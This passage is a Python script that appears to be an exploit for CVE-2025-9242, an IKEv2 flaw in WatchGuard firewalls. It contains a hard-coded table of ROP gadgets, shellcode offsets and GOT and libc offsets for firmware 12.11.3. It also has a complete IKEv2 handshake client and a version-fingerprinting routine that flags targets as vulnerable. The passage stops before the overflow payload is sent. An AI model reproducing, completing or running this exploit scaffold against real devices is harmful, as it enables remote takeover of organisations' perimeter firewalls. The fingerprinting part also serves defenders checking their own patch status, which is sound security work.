README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import socket
import struct
import random
import enum
import hashlib
import hmac
import logging
import base64
import binascii
import re
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
# Configure logging
logger = logging.getLogger(__name__)
FW_VERSION = None
BUILD_NUMBER = None
class WatchGuardFw:
ADDRESSES = {
'12.11.3': {
'pop_rcx_ret': 0x4225ab, # 0x00000000004225ab: pop rcx; ret;
'mov_rax_rcx_ret': 0x5a4fac, # 0x00000000005a4fac: mov rax, rcx; ret;
'mov_rbp_rsp_call_rax': 0x42008d, # 0x000000000042008d: mov rbp, rsp; call rax;
'pop_r13_ret': 0x594ac4, # 0x0000000000594ac4: pop r13; ret;
'mov_rax_rbp_pop_rbx_pop_rbp_ret': 0x598d69, # 0x0000000000598d69: mov rax, rbp; pop rbx; pop rbp; ret;
'sub_rax_rcx_ret': 0x5a4fd8, # 0x00000000005a4fd8: sub rax, rcx; ret;
'push_rax_mov_rax_rbx_pop_rbx_ret': 0x5a4468, # 0x00000000005a4468: push rax; mov rax, rbx; pop rbx; ret;
'mov_rdi_rbx_call_rax': 0x42fce4, # 0x000000000042fce4: mov rdi, rbx; call rax;
'pop_rsi_ret': 0x508ece, # 0x0000000000508ece: pop rsi; ret;
'pop_rdx_ret': 0x483a4a, # 0x0000000000483a4a: pop rdx; ret;
'mov_rax_rax_ret': 0x5b145e, # 0x00000000005b145e: mov rax, qword ptr [rax]; ret;
'jmp_rax': 0x41908f, # 0x000000000041908f: jmp rax;
'jmp_rbx': 0x449ba3, # 0x0000000000449ba3: jmp rbx;
'offset_data': 0x00, # Offset from data
'offset_shellcode': 0x30, # Offset from buffer
'offset_stack': 0x340, # Offset from rsp to start of buffer
'offset_stack_page_aligned': 0x0cc8, # Offset from rsp to start of buffer page aligned
'offset_bind_mprotect': 0x5ea0, # Offset from mprotect to bind in libc.so
'got_bind': 0x658028, # GOT of bind
},
}
def __init__(self, version):
self.version = version
if version not in self.ADDRESSES:
raise ValueError(f'Unsupported WatchGuard version: {version}')
self.addresses = self.ADDRESSES[version]
def get(self, name, fmt='<Q'):
return struct.pack(fmt, self.addresses[name])
def get_i(self, name):
return self.addresses[name]
@staticmethod
def has(version):
return version in WatchGuardFw.ADDRESSES
@staticmethod
def version_tuple(v):
return tuple(map(int, (v.split("."))))
class PayloadType(enum.IntEnum):
NONE = 0
TRANSFORM = 3
SECURITY_ASSOCIATION = 33
KEY_EXCHANGE = 34
IDENTIFIER_INITIATOR = 35
IDENTIFIER_RESPONDER = 36
CERTIFICATE = 37
CERTIFICATE_REQUEST = 38
AUTHENTICATION = 39
NONCE = 40
NOTIFY = 41
DELETE = 42
VENDOR_ID = 43
TRAFFIC_SELECTOR_INITIATOR = 44
TRAFFIC_SELECTOR_RESPONDER = 45
ENCRYPTED = 46
CONFIGURATION = 47
EXTENSIBLE_AUTHENTICATION = 48
class ExchangeType(enum.IntEnum):
IKE_SA_INIT = 34
IKE_AUTH = 35
CREATE_CHILD_SA = 36
INFORMATIONAL = 37
class TransformType(enum.IntEnum):
ENCRYPTION_ALGORITHM = 1
PSEUDO_RANDOM_FUNCTION = 2
INTEGRITY_ALGORITHM = 3
DIFFIE_HELLMAN_GROUP = 4
class NotifyType(enum.IntEnum):
UNSUPPORTED_CRITICAL_PAYLOAD = 1
INVALID_IKE_SPI = 4
INVALID_MAJOR_VERSION = 5
INVALID_SYNTAX = 7
INVALID_MESSAGE_ID = 9
INVALID_SPI = 11
NO_PROPOSAL_CHOSEN = 14
INVALID_KE_PAYLOAD = 17
AUTHENTICATION_FAILED = 24
SINGLE_PAIR_REQUIRED = 34
NO_ADDITIONAL_SAS = 35
INTERNAL_ADDRESS_FAILURE = 36
FAILED_CP_REQUIRED = 37
TS_UNACCEPTABLE = 38
INVALID_SELECTORS = 39
INITIAL_CONTACT = 16384
SET_WINDOW_SIZE = 16385
ADDITIONAL_TS_POSSIBLE = 16386
IPCOMP_SUPPORTED = 16387
NAT_DETECTION_SOURCE_IP = 16388
NAT_DETECTION_DESTINATION_IP = 16389
COOKIE = 16390
USE_TRANSPORT_MODE = 16391
HTTP_CERT_LOOKUP_SUPPORTED = 16392
REKEY_SA = 16393
ESP_TFC_PADDING_NOT_SUPPORTED = 16394
NON_FIRST_FRAGMENTS_ALSO = 16395
MOBIKE_SUPPORTED = 16396
MULTIPLE_AUTH_SUPPORTED = 16404
REDIRECT_SUPPORTED = 16406
IKEV2_FRAGMENTATION_SUPPORTED = 16430
SIGNATURE_HASH_ALGORITHMS = 16431
class ConfigurationAttribute(enum.IntEnum):
INTERNAL_IP4_ADDRESS = 1
INTERNAL_IP4_NETMASK = 2
INTERNAL_IP4_DNS = 3
INTERNAL_IP4_MBNS = 4
APPLICATION_VERSION = 7
INTERNAL_IP6_ADDRESS = 8
INTERNAL_IP6_DNS = 10
class EncryptionAlgorithm(enum.IntEnum):
ENCR_DES_IV64 = 1
ENCR_DES = 2
ENCR_3DES = 3
ENCR_RC5 = 4
ENCR_IDEA = 5
ENCR_CAST = 6
ENCR_BLOWFISH = 7
ENCR_3IDEA = 8
ENCR_DES_IV32 = 9
RESERVED = 10
ENCR_NULL = 11
ENCR_AES_CBC = 12
ENCR_AES_CTR = 13
ENCR_AES_CCM_8 = 14
ENCR_AES_CCM_12 = 15
ENCR_AES_CCM_16 = 16
ENCR_AES_GCM_8 = 18
ENCR_AES_GCM_12 = 19
ENCR_AES_GCM_16 = 20
ENCR_NULL_AUTH_AES_GMAC = 21
P1619_XTS_AES = 22
ENCR_CAMELLIA_CBC = 23
ENCR_CAMELLIA_CTR = 24
ENCR_CAMELLIA_CCM_8 = 25
ENCR_CAMELLIA_CCM_12 = 26
ENCR_CAMELLIA_CCM_16 = 27
ENCR_CHACHA20_POLY1305 = 28
ENCR_AES_CCM_8_IIV = 29
ENCR_AES_GCM_16_IIV = 30
ENCR_CHACHA20_POLY1305_IIV = 31
ENCR_KUZNYECHIK_MGM_KTREE = 32
ENCR_MAGMA_MGM_KTREE = 33
ENCR_KUZNYECHIK_MGM_MAC_KTREE = 34
ENCR_MAGMA_MGM_MAC_KTREE = 35
class PseudoRandomFunction(enum.IntEnum):
PRF_HMAC_MD5 = 1
PRF_HMAC_SHA1 = 2
PRF_HMAC_TIGER = 3
PRF_AES128_XCBC = 4
PRF_HMAC_SHA2_256 = 5
PRF_HMAC_SHA2_384 = 6
PRF_HMAC_SHA2_512 = 7
PRF_AES128_CMAC = 8
PRF_HMAC_STREEBOG_512 = 9
class IntegrityAlgorithm(enum.IntEnum):
AUTH_HMAC_MD5_96 = 1
AUTH_HMAC_SHA1_96 = 2
AUTH_DES_MAC = 3
AUTH_KPDK_MD5 = 4
AUTH_AES_XCBC_96 = 5
AUTH_HMAC_MD5_128 = 6
AUTH_HMAC_SHA1_160 = 7
AUTH_AES_CMAC_96 = 8
AUTH_AES_128_GMAC = 9
AUTH_AES_192_GMAC = 10
AUTH_AES_256_GMAC = 11
AUTH_HMAC_SHA2_256_128 = 12
AUTH_HMAC_SHA2_384_192 = 13
AUTH_HMAC_SHA2_512_256 = 14
class DiffieHellmanGroup(enum.IntEnum):
DH_GROUP_2048_BIT_MODP = 14
DH_GROUP_768_BIT_MODP = 1
DH_GROUP_1024_BIT_MODP = 2
DH_GROUP_1536_BIT_MODP = 5
DH_GROUP_3072_BIT_MODP = 15
DH_GROUP_4096_BIT_MODP = 16
DH_GROUP_6144_BIT_MODP = 17
DH_GROUP_8192_BIT_MODP = 18
RANDOM_ECP_GROUP_256_BIT = 19
RANDOM_ECP_GROUP_384_BIT = 20
RANDOM_ECP_GROUP_521_BIT = 21
DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP = 22
DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP = 23
DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP = 24
RANDOM_ECP_GROUP_192_BIT = 25
RANDOM_ECP_GROUP_224_BIT = 26
BRAINPOOLP224R1 = 27
BRAINPOOLP256R1 = 28
BRAINPOOLP384R1 = 29
BRAINPOOLP512R1 = 30
CURVE25519 = 31
CURVE448 = 32
GOST3410_2012_256 = 33
GOST3410_2012_512 = 34
ML_KEM_512 = 35
ML_KEM_768 = 36
ML_KEM_1024 = 37
class IkePacker:
@staticmethod
def header(initiator_spi, responder_spi, next_payload, exchange_type, message_id, version=0x20, flags = 0x08):
# Flags: 0x08 = Initiator, No higher version, Request
return struct.pack('>QQBBBBII', initiator_spi, responder_spi, next_payload, version, exchange_type, flags, message_id, 0)
@staticmethod
def payload_header(next_payload, payload, critical = 0):
return struct.pack('>BBH', next_payload, critical, 4 + len(payload)) + payload
@staticmethod
def security_association(next_payload, proposal):
return IkePacker.payload_header(next_payload, proposal)
@staticmethod
def proposal(next_payload, number, id, transforms = [], spi = b''):
b_transforms = b''
for transform in transforms:
if isinstance(transform, IkeTransform):
b_transforms += transform.pack()
continue
b_transforms += transform
return IkePacker.payload_header(next_payload, struct.pack('>BBBB', number, id, len(spi), len(transforms)) + spi + b_transforms)
@staticmethod
def key_exchange(next_payload, dh_group, data, reserved = 0):
return IkePacker.payload_header(next_payload, struct.pack('>HH', dh_group, reserved) + data)
@staticmethod
def nonce(next_payload, nonce):
return IkePacker.payload_header(next_payload, nonce)
@staticmethod
def notify(next_payload, notify_type, data = b'', protocol_id = 1, spi_size = 0):
return IkePacker.payload_header(next_payload, struct.pack('>BBH', protocol_id, spi_size, notify_type) + data)
@staticmethod
def vendor_id(next_payload, vendor_id):
return IkePacker.payload_header(next_payload, vendor_id)
@staticmethod
def encrypted(next_payload, data):
return IkePacker.payload_header(next_payload, data)
@staticmethod
def identification_initiator(next_payload, id_type, data, reserved=b'\x00\x00\x00'):
return IkePacker.payload_header(next_payload, struct.pack('>B', id_type) + reserved + data)
@staticmethod
def certificate(next_payload, encoding, data):
return IkePacker.payload_header(next_payload, struct.pack('>B', encoding) + data)
@staticmethod
def certificate_request(next_payload, type, data = []):
return IkePacker.payload_header(next_payload, struct.pack('>B', type) + b''.join(data))
@staticmethod
def authentication(next_payload, authentication_method, data, reserved=b'\x00\x00\x00'):
return IkePacker.payload_header(next_payload, struct.pack('>B', authentication_method) + reserved + data)
@staticmethod
def eap(next_payload, type=1, data=b'', code = 1, identifier = 1):
return IkePacker.payload_header(next_payload, struct.pack('>BBHB', code, identifier, len(data)+5, type) + data)
@staticmethod
def configuration(next_payload, configuration_type, attributes = [], reserved=b'\x00\x00\x00'):
return IkePacker.payload_header(next_payload, struct.pack('>B', configuration_type) + reserved + b''.join(attributes))
@staticmethod
def configuration_attribute(tag, value=b''):
return struct.pack('>HH', tag, len(value)) + value
@staticmethod
def traffic_selector(next_payload, selectors = [], reserved=b'\x00\x00\x00'):
return IkePacker.payload_header(next_payload, struct.pack('>B', len(selectors)) + reserved + b''.join(selectors))
@staticmethod
def traffic_selector_ipv4_address_range(start_port, end_port, start_address, end_address):
type = 7 # TS_IPV4_ADDR_RANGE
protocol_id = 0
length = 16
start_address = struct.unpack('!L', socket.inet_aton(start_address))[0]
end_address = struct.unpack('!L', socket.inet_aton(end_address))[0]
return struct.pack('>BBHHHII', type, protocol_id, length, start_port, end_port, start_address, end_address)
class IkeNotify:
def __init__(self, protocol_id, message_type, spi, notification_data):
self.protocol_id = protocol_id
self.message_type = message_type
self.spi = spi
self.notification_data = notification_data
@staticmethod
def unpack(data):
protocol_id, spi_size, message_type = struct.unpack('>2BH', data[:4])
spi = data[4:4 + spi_size]
notification_data = data[4 + spi_size:]
return IkeNotify(protocol_id, message_type, spi, notification_data)
class IkeSecurityAssociation:
def __init__(self, proposal):
self.proposal = proposal
@staticmethod
def unpack(data):
next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(data[:4])
if next_payload != PayloadType.NONE:
raise IkeException(f"Expected payload type {PayloadType.NONE} but got {next_payload}")
if len(data) != payload_length:
raise IkeException(f"Expected payload length {payload_length} but got {len(data)}")
return IkeSecurityAssociation(IkeProposal.unpack(data[4:]))
class IkeProposal:
def __init__(self, proposal_number, protocol_id, spi, transforms):
self.proposal_number = proposal_number
self.protocol_id = protocol_id
self.spi = spi
self.transforms = transforms
@staticmethod
def unpack(data):
offset = 0
proposal_number, protocol_id, spi_size, num_transforms = struct.unpack('>BBBB', data[offset:offset+4])
offset += 4
spi = b''
if spi_size > 0:
spi = data[offset:offset+spi_size]
offset += spi_size
transforms = []
for i in range(num_transforms):
transform, size = IkeTransform.unpack(data[offset:])
transforms.append(transform)
offset += size
return IkeProposal(proposal_number, protocol_id, spi, transforms)
class IkeTransform:
def __init__(self, next_payload, transform_type, transform_id, transform_attributes=None, reserved=0):
self.next_payload = next_payload
self.transform_type = transform_type
self.reserved = reserved
self.transform_id = transform_id
self.transform_attributes = transform_attributes
def __str__(self):
if self.transform_type == TransformType.ENCRYPTION_ALGORITHM:
attr = ''
if self.transform_attributes != None:
if 14 in self.transform_attributes: # Key Length
attr = f' ({self.transform_attributes[14]}-bit)'
if self.transform_id in iter(EncryptionAlgorithm):
return EncryptionAlgorithm(self.transform_id).name + attr
return f'ENCR_{self.transform_id}{attr}'
if self.transform_type == TransformType.PSEUDO_RANDOM_FUNCTION:
if self.transform_id in iter(PseudoRandomFunction):
return PseudoRandomFunction(self.transform_id).name
return f'PRF_{self.transform_id}'
if self.transform_type == TransformType.INTEGRITY_ALGORITHM:
if self.transform_id in iter(IntegrityAlgorithm):
return IntegrityAlgorithm(self.transform_id).name
return f'AUTH_{self.transform_id}'
if self.transform_type == TransformType.DIFFIE_HELLMAN_GROUP:
if self.transform_id in iter(DiffieHellmanGroup):
return DiffieHellmanGroup(self.transform_id).name
return f'DH_{self.transform_id}'
def pack(self):
transform = struct.pack('>BBH', self.transform_type, self.reserved, self.transform_id)
if self.transform_attributes:
transform += struct.pack('>I', self.transform_attributes)
return IkePacker.payload_header(self.next_payload, transform)
@staticmethod
def unpack(data):
# Parse transform payload header
offset = 0
next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(data[offset:offset+4])
offset += 4
if next_payload != PayloadType.NONE and next_payload != PayloadType.TRANSFORM:
raise IkeException(f"Expected payload type {PayloadType.NONE} or {PayloadType.TRANSFORM} but got {next_payload}")
# Parse transform data
transform_type, reserved, transform_id = struct.unpack('>BBH', data[offset:offset+4])
offset += 4
# Parse transform attributes if present
transform_attributes = None
if payload_length > 8:
fmt, type, value = struct.unpack('>BBH', data[offset:offset+4])
transform_attributes = {type: value}
offset += 4
return IkeTransform(next_payload, transform_type, transform_id, transform_attributes, reserved), offset
class IkeResponse:
def __init__(self, initiator_spi, responder_spi, version, exchange_type, flags, message_id, length, payloads):
self.initiator_spi = initiator_spi
self.responder_spi = responder_spi
self.version = version
self.exchange_type = exchange_type
self.flags = flags
self.message_id = message_id
self.length = length
self.payloads = payloads
def get(self, type):
payloads = []
for payload in self.payloads:
if payload['type'] == type:
payloads.append(payload['payload'])
return payloads
class IkeUnpacker:
@staticmethod
def unpack_payload_header(data):
return struct.unpack('>BBH', data[:4])
@staticmethod
def unpack(response):
initiator_spi, responder_spi, next_payload, version, exchange_type, flags, message_id, length = struct.unpack('>QQBBBBII', response[:28])
raw_payloads = response[28:]
i = 0
payload_type = next_payload
payloads = []
while i < len(raw_payloads):
next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(raw_payloads[i:i+4])
payload = raw_payloads[i+4:i+payload_length]
# Parsed Types
if payload_type == PayloadType.NOTIFY:
payload = IkeNotify.unpack(payload)
elif payload_type == PayloadType.SECURITY_ASSOCIATION:
payload = IkeSecurityAssociation.unpack(payload)
payloads.append({
'type': payload_type,
'critical': critical,
'payload': payload
})
i += payload_length
payload_type = next_payload
return IkeResponse(
initiator_spi,
responder_spi,
version,
exchange_type,
flags,
message_id,
length,
payloads
)
class IkeCrypto:
def __init__(self):
self.initiator_nonce = self.generate_nonce(32)
self.responder_nonce = None
self.initiator_spi = random.randint(0, 0xffffffffffffffff)
self.responder_spi = 0x0000000000000000
self.client_private_key = None
self.client_public_key = None
self.client_public_key_bytes = None
self.server_public_key_bytes = None
self.shared_secret = None
self.skeyseed = None
self.SK_d = None
self.SK_ai = None
self.SK_ar = None
self.SK_ei = None
self.SK_er = None
# Encryption: AES-CBC-256, Integrity: HMAC-SHA2-256-128, DH: MODP-14, PRF: SHA256
self.generate_keys = self.dh_modp_14_generate_keys
self.compute_shared_secret = self.dh_modp_14_compute_shared_secret
self.prf = self.prf_sha256
self.encrypt = self.encrypt_aes_cbc
self.compute_integrity = self.compute_integrity_sha256
self.generate_keys()
def key_exchange(self, responder_spi, responder_nonce, server_public_key_bytes):
self.responder_spi = responder_spi
self.responder_nonce = responder_nonce
self.server_public_key_bytes = server_public_key_bytes
self.shared_secret = self.compute_shared_secret()
# Generate SKEYSEED and derive keys
self.generate_skeyseed()
self.derive_keys()
def generate_nonce(self, length=32):
"""Generate a cryptographically secure nonce"""
return random.getrandbits(length * 8).to_bytes(length, 'big')
def dh_modp_14_generate_keys(self):
# Generate our private key for DH exchange (MODP group 14 = 2048-bit)
# RFC 3526 MODP Group 14 prime - The standard 2048-bit DH prime
p_hex = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF'
self.p = int(p_hex, 16)
# Verify this is exactly 2048 bits
if self.p.bit_length() != 2048:
self.p = self.p >> (self.p.bit_length() - 2048)
g = 2
# Generate our private key (random number between 1 and p-1)
self.client_private_key = random.randint(1, self.p - 1)
# Compute our public key: g^private_key mod p
self.client_public_key = pow(g, self.client_private_key, self.p)
# Convert to bytes (256 bytes for 2048-bit MODP group)
# Calculate the required byte length for this public key
public_key_bit_length = self.client_public_key.bit_length()
public_key_byte_length = (public_key_bit_length + 7) // 8 # Round up to nearest byte
# For MODP Group 14, the public key should be at most 256 bytes (2048 bits)
# But we need to handle cases where it might be smaller
if public_key_byte_length > 256:
raise ValueError(f"Public key too large: {public_key_byte_length} bytes (max 256)")
# Convert to bytes and pad with leading zeros to make it exactly 256 bytes
self.client_public_key_bytes = self.client_public_key.to_bytes(public_key_byte_length, 'big').rjust(256, b'\x00')
def dh_modp_14_compute_shared_secret(self):
# Perform DH key exchange
# Convert server's public key from bytes to integer
server_public_key = int.from_bytes(self.server_public_key_bytes, 'big')
# Compute the shared secret: server_public_key^client_private_key mod p
dh_shared_secret_int = pow(server_public_key, self.client_private_key, self.p)
# Convert shared secret to bytes with proper padding
shared_secret_bit_length = dh_shared_secret_int.bit_length()
shared_secret_byte_length = (shared_secret_bit_length + 7) // 8
if shared_secret_byte_length > 256:
raise ValueError(f"Shared secret too large: {shared_secret_byte_length} bytes (max 256)")
# Convert to bytes and pad to 256 bytes
dh_shared_secret = dh_shared_secret_int.to_bytes(shared_secret_byte_length, 'big').rjust(256, b'\x00') # Pad to 256 bytes
return dh_shared_secret
def prf_sha256(self, key, data):
"""PRF using SHA256"""
return hmac.new(key, data, hashlib.sha256).digest()
def prf_plus(self, prf_func, key, seed, length):
"""IKEv2 PRF+ function - RFC 4306 compliant"""
result = b''
prev = b''
counter = 1
while len(result) < length:
# RFC 4306: PRF(SKEYSEED, Ni | Nr | SPIi | SPIr | counter)
# where counter is 1 byte and we chain the previous output
data = prev + seed + struct.pack('!B', counter) # 1-byte counter + chaining
prev = prf_func(key, data)
result += prev
counter += 1
return result[:length]
def generate_skeyseed(self):
"""Generate SKEYSEED from DH shared secret and nonces"""
# RFC 4306: SKEYSEED = prf(Ni | Nr, g^ir)
# Key: Ni | Nr (nonces), Data: g^ir (DH shared secret)
self.skeyseed = self.prf(self.initiator_nonce + self.responder_nonce, self.shared_secret)
return self.skeyseed
def derive_keys(self):
"""Derive IKEv2 keys from SKEYSEED"""
# Create the seed for key derivation
# RFC 4306: {SK_d | SK_ai | SK_ar | SK_ei | SK_er} = prf+(SKEYSEED, Ni | Nr | SPIi | SPIr)
# Seed: Ni | Nr | SPIi | SPIr (nonces first, then SPIs)
seed = self.initiator_nonce + self.responder_nonce + self.initiator_spi.to_bytes(8, 'big') + self.responder_spi.to_bytes(8, 'big')
# Derive keys using PRF+ (PRF_HMAC_SHA2_256)
# RFC 4306: {SK_d | SK_ai | SK_ar | SK_ei | SK_er} = prf+(SKEYSEED, Ni | Nr | SPIi | SPIr)
# Each key is 32 bytes (SHA256 output), so we need 5 * 32 = 160 bytes total
derived_keys = self.prf_plus(self.prf, self.skeyseed, seed, 160) # 160 bytes total (5 * 32 bytes)
# Split into individual keys according to RFC 4306
self.SK_d = derived_keys[0:32] # For deriving child SA keys
self.SK_ai = derived_keys[32:64] # Authentication key for initiator
self.SK_ar = derived_keys[64:96] # Authentication key for responder
self.SK_ei = derived_keys[96:128] # Encryption key for initiator
self.SK_er = derived_keys[128:160] # Encryption key for responder
def generate_iv(self, key, nonce):
"""Generate IV for encryption"""
# For IKEv2, IV is typically derived from the key and nonce
# Using a simple approach: hash of key + nonce, truncated to 16 bytes
return hashlib.sha256(key + nonce).digest()[:16]
def encrypt_aes_cbc(self, data, key, iv):
"""Encrypt data using AES-CBC"""
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
encryptor = cipher.encryptor()
# Pad data to block size (16 bytes for AES)
padding_length = 16 - (len(data) % 16)
padded_data = data + bytes([padding_length-1] * padding_length)
return encryptor.update(padded_data) + encryptor.finalize()
def compute_integrity_sha256(self, data, key):
"""Compute integrity checksum using HMAC-SHA256"""
return hmac.new(key, data, hashlib.sha256).digest()
class IkeException(Exception):
pass
class IkeNoProposalChosenException(IkeException):
pass
class IkeInvalidKEPayloadException(IkeException):
pass
class IkeMissingNonceException(IkeException):
pass
class IkeMissingKeyExchangeException(IkeException):
pass
class Ike:
def __init__(self, ip, port, timeout = 5):
self.ip = ip
self.port = port
self.timeout = timeout
self.crypto = None
self.sock = None
self.reset()
@staticmethod
def update_request_length(request):
"""Update the length field in the header"""
total_length = len(request)
return request[:24] + struct.pack('>I', total_length) + request[28:]
def reset(self):
if self.sock != None:
self.close()
self.crypto = IkeCrypto()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.settimeout(self.timeout)
def send(self, packet):
self.sock.sendto(packet, (self.ip, self.port))
response, addr = self.sock.recvfrom(65535)
return IkeUnpacker.unpack(response)
def send_encrypted(self, exchange_type, message_id, payloads):
# Create the IKE header first
request = IkePacker.header(self.crypto.initiator_spi, self.crypto.responder_spi, PayloadType.ENCRYPTED, exchange_type, message_id)
# Encrypt the inner payloads
iv = self.crypto.generate_iv(self.crypto.SK_ei, self.crypto.initiator_nonce)
encrypted_data = self.crypto.encrypt(payloads, self.crypto.SK_ei, iv)
# Create the encrypted payload
integrity_data = (b"\x00" * 16)
request += IkePacker.encrypted(PayloadType.IDENTIFIER_INITIATOR, iv + encrypted_data + integrity_data)
# Update the length field in the header
request = Ike.update_request_length(request)
# Compute integrity checksum over the entire message (including updated length, excluding integrity checksum)
integrity_data = self.crypto.compute_integrity(request[:-16], self.crypto.SK_ai)[:16] # 16 bytes for AUTH_HMAC_SHA2_256_128
# Replace integrity checksum
request = request[:-16] + integrity_data
return self.send(request)
def close(self):
self.sock.close()
self.sock = None
def sa_init(self, default_transforms = None):
global FW_VERSION, BUILD_NUMBER
dh_group = DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value
key_exchange = self.crypto.client_public_key_bytes # Group 14 = 2048 bit MODP group
transforms = default_transforms
if default_transforms is None:
transforms = [
IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, EncryptionAlgorithm.ENCR_AES_CBC.value, 0x800e0100),
IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, PseudoRandomFunction.PRF_HMAC_SHA2_256.value),
IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, IntegrityAlgorithm.AUTH_HMAC_SHA2_256_128.value),
IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value),
]
else:
# If we are not using default transforms, fake the key exchange payload
for transform in transforms:
if transform.transform_type == TransformType.DIFFIE_HELLMAN_GROUP:
dh_group = transform.transform_id
if dh_group != DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP:
key_sizes = {
8192: [
DiffieHellmanGroup.DH_GROUP_8192_BIT_MODP,
],
6144: [
DiffieHellmanGroup.DH_GROUP_6144_BIT_MODP,
],
4096: [
DiffieHellmanGroup.DH_GROUP_4096_BIT_MODP,
],
3072: [
DiffieHellmanGroup.DH_GROUP_3072_BIT_MODP,
],
2048: [
DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP,
DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP,
],
1536: [
DiffieHellmanGroup.DH_GROUP_1536_BIT_MODP,
],
1024: [
DiffieHellmanGroup.DH_GROUP_1024_BIT_MODP,
DiffieHellmanGroup.DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP,
DiffieHellmanGroup.ML_KEM_1024,
],
768: [
DiffieHellmanGroup.DH_GROUP_768_BIT_MODP,
DiffieHellmanGroup.ML_KEM_768,
],
521: [
DiffieHellmanGroup.RANDOM_ECP_GROUP_521_BIT,
],
512: [
DiffieHellmanGroup.BRAINPOOLP512R1,
DiffieHellmanGroup.GOST3410_2012_512,
DiffieHellmanGroup.ML_KEM_512,
],
448: [
DiffieHellmanGroup.CURVE448,
],
384: [
DiffieHellmanGroup.RANDOM_ECP_GROUP_384_BIT,
DiffieHellmanGroup.BRAINPOOLP384R1,
],
256: [
DiffieHellmanGroup.RANDOM_ECP_GROUP_256_BIT,
DiffieHellmanGroup.BRAINPOOLP256R1,
DiffieHellmanGroup.CURVE25519,
DiffieHellmanGroup.GOST3410_2012_256,
],
224: [
DiffieHellmanGroup.RANDOM_ECP_GROUP_224_BIT,
DiffieHellmanGroup.BRAINPOOLP224R1,
],
192: [
DiffieHellmanGroup.RANDOM_ECP_GROUP_192_BIT,
]
}
found = False
for size in key_sizes:
for group in key_sizes[size]:
if group == dh_group:
key_exchange = b'\x00' * (size//8)
found = True
break
if found:
break
# Send request and process response
r = self.send(Ike.update_request_length(
IkePacker.header(self.crypto.initiator_spi, self.crypto.responder_spi, PayloadType.SECURITY_ASSOCIATION, ExchangeType.IKE_SA_INIT, 0) +
IkePacker.security_association(PayloadType.KEY_EXCHANGE, IkePacker.proposal(PayloadType.NONE, 1, 1, transforms)) +
IkePacker.key_exchange(PayloadType.NONCE, dh_group, key_exchange) +
IkePacker.nonce(PayloadType.NOTIFY, self.crypto.initiator_nonce) +
IkePacker.notify(PayloadType.NOTIFY, NotifyType.NAT_DETECTION_DESTINATION_IP, bytes.fromhex('a6358d813592fdd80a9aaa3390f39c8a5a76b6e4')) +
IkePacker.notify(PayloadType.VENDOR_ID, NotifyType.NAT_DETECTION_SOURCE_IP, bytes.fromhex('4cc324152ba3f68ef649ac1e6f96f33791611db2')) +
IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('c590254e5403cbb71f3d493111d7fcad')) +
IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('c61baca1f1a60cc10800000000000000')) +
IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('4048b7d56ebce88525e7de7f00d6c2d3c0000000')) +
IkePacker.vendor_id(PayloadType.NOTIFY, bytes.fromhex('4048b7d56ebce88525e7de7f00d6c2d3')) +
IkePacker.notify(PayloadType.NOTIFY, NotifyType.IKEV2_FRAGMENTATION_SUPPORTED, protocol_id = 0) +
IkePacker.notify(PayloadType.NOTIFY, NotifyType.REDIRECT_SUPPORTED, protocol_id = 0) +
IkePacker.notify(PayloadType.NONE, NotifyType.SIGNATURE_HASH_ALGORITHMS, bytes.fromhex('0001000200030004'), protocol_id = 0)
))
responder_spi = r.responder_spi
# Check for Watchguard firmware version
if FW_VERSION == None:
vendors = r.get(PayloadType.VENDOR_ID)
for vendor in vendors:
# WatchGuard vendor id
if len(vendor) > 32 and vendor[:8].hex() == 'bfc22e9856ba9936':
try:
watchguard_data = base64.b64decode(vendor[32:].decode('ascii')).decode()
logging.debug(f'[#] WatchGuard vendor data: {watchguard_data}')
# VN=12.11.3 BN=719894
# VN=12.11.4 BN=722644
match = re.search(r"VN=([0-9\.]+) BN=([0-9]+)", watchguard_data)
if match:
FW_VERSION = match.group(1)
BUILD_NUMBER = match.group(2)
logging.info(f'[#] WatchGuard Firmware Version: {FW_VERSION}')
logging.info(f'[#] WatchGuard Build Number: {BUILD_NUMBER}')
if WatchGuardFw.version_tuple(FW_VERSION) < WatchGuardFw.version_tuple("12.11.4"):
logging.info(f"[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number {FW_VERSION} < 12.11.4")
else:
logging.info(f"[-] IKEv2 service is patched against CVE-2025-9242 based on version number {FW_VERSION} >= 12.11.4")
